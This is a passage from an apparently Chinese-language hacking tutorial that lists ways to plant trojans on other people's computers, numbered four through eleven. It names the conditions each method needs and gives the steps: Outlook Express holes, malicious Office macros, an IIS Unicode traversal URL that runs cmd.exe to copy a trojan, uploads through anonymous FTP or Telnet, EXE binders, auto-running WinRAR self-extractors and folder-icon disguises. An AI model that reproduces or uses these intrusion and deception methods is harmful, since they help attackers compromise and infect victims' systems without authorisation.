④通过OE入侵.
要求:对方OE未打补丁.
用法:与③中的用法1,3,4相同.
⑤通过WORD/EXCEL/ACCESS入侵
要求:对方未对宏的运行做限制.
用法:编写恶意的宏,夹杂木马,一运行office文档便植入主机中.
用法2:通过OFFICE的帮助文件漏洞入侵.
⑥通过Unicode漏洞入侵
要求:对方有Unicode漏洞
用法(举例):_blank>http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?
+COPY+本地木马路径+远程路径+木马名
⑦通过FTP入侵
要求:对方的FTP可以匿名登陆而且可写入
用法:直接将木马传上去即可.
⑧通过TELNET入侵
要求:具有对方的一个具有写权限的帐号
用法:用TELNET命令将木马传上去.
⑨EXE合并木马
要求:无(但用于合并木马的EXE文件体积应该尽量小,而且应该是比较熟悉的程序.)
用法:用EXE文件合并器将两个EXE合并即可.
⑩winrar木马入侵
要求:对方安装了Winrar
用法:将压缩包设置为自解压格式,并设置自动运行的选项,再将RAR图标更改.
⑾文件夹惯性点击法
要求:无
用法:将一个木马伪装成文件夹的图标,再将其放于几层目录中. |